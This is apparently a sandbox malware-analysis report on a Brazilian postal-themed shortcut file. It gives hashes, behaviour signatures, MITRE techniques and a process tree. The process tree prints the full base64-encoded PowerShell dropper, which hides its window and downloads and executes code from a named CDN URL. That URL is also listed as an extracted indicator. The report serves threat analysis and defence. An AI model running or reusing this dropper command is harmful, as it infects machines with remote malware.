858c09f6032b213e8cb62f48d6ecb7237637e9eea5866973905d6c1f13a81bdf

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
13/09/2024, 19:03

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Mercadoria_Devolvida-Correios-0JY43R0W.lnk
Size

3KB
MD5

246e74b6fffb9d5994f7f70bb6509b45
SHA1

4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256

0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512

178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	4812	powershell.exe
13	4812	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4812	powershell.exe
4812	powershell.exe
4812	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4812	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4964 wrote to memory of 4812	4964	cmd.exe	84
PID 4964 wrote to memory of 4812	4964	cmd.exe	84
PID 4812 wrote to memory of 3532	4812	powershell.exe	87
PID 4812 wrote to memory of 3532	4812	powershell.exe	87
PID 3532 wrote to memory of 1688	3532	csc.exe	89
PID 3532 wrote to memory of 1688	3532	csc.exe	89

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-0JY43R0W.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4964
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4812
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yhwa0hhe\yhwa0hhe.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3532
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D69.tmp" "c:\Users\Admin\AppData\Local\Temp\yhwa0hhe\CSCA2F4C0D8795E4F4F8EC23946D4DE57.TMP"
      4⤵
      PID:1688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES9D69.tmp

Filesize
1KB

MD5
0ca62238cbd3c686fb4b5bbef6a85de8

SHA1
2499d44fbf842035a3093eec736da72dba862f0b

SHA256
69b77696162b464ab2b00f5c0761b9ebabc9006d9c8752d8ff1a147c8f0a2e5a

SHA512
9272e119f1aed9eda5e5a9326dad0bfb8bd1d52ba8bf8001be46604b9e09ebfd65dea89cbcb8ae010b0dc4539f660c6918c725fdf3040337fe81621d6919d59d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_luhxvmze.oor.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\yhwa0hhe\yhwa0hhe.dll

Filesize
3KB

MD5
9b13bf1c4440f48c45a2cd7ae9fb75d3

SHA1
4049da6e5da3ee44e13e34e4c60778dd56f156ff

SHA256
6b7e44a269cdff86311e59c6ee13f9defc904786e68517c888ca1bb48f93c691

SHA512
1d3771d35e03a75f4c4e008a2767cca4042dc56c7f3f1aec76c70bcc03e51f7d41676162987c03ad410826761c673f113522cfd2b126f0712e0fec2ecf8a3017

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yhwa0hhe\CSCA2F4C0D8795E4F4F8EC23946D4DE57.TMP

Filesize
652B

MD5
ba58f08c53cad8f2c78d45fa74d0a198

SHA1
e16ad8aa9bc43b3f6aad8bfcc08e36f9cbba31ad

SHA256
7fe36024d40a7105c70e0e66f3b2d19535772147c0f37840798458f905490e53

SHA512
7333aae87207e987789aaa38be78a562f90212a4fa1cbc8f00407b5ff823c05bc405b2e3c4fc7ed3f82499efaca734543a1684ab9d7544b92d79761bfcdbca5a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yhwa0hhe\yhwa0hhe.0.cs

Filesize
187B

MD5
7b0e7177dfbb9edd1c1ef08b4fdfae2f

SHA1
cb11a0252cdad66ec247312ccb7feb46456e52b6

SHA256
6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

SHA512
7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yhwa0hhe\yhwa0hhe.cmdline

Filesize
369B

MD5
d3f117dce643855b3f2d7eb146530d12

SHA1
f6f0b7829615bd807577119e0580202cb452dadc

SHA256
e47d917e1ebcd415128dca81f9685132a0a78b152e2fc73779b270a91680c559

SHA512
2747e668b86710a5c3152b08c10f066c4bc21a65de2d919cb0a5f7e57c7f1d2402d6571b64c9900ac5a5ef6bf7b303c6497bc54e5993e42380a1b9910f33fef0

Download Submit
memory/4812-2-0x00007FFA20483000-0x00007FFA20485000-memory.dmp

Filesize
8KB

Download
memory/4812-8-0x000001D8407D0000-0x000001D8407F2000-memory.dmp

Filesize
136KB

Download
memory/4812-13-0x00007FFA20480000-0x00007FFA20F41000-memory.dmp

Filesize
10.8MB

Download
memory/4812-16-0x00007FFA20480000-0x00007FFA20F41000-memory.dmp

Filesize
10.8MB

Download
memory/4812-27-0x000001D8407A0000-0x000001D8407A8000-memory.dmp

Filesize
32KB

Download
memory/4812-31-0x00007FFA20480000-0x00007FFA20F41000-memory.dmp

Filesize
10.8MB

Download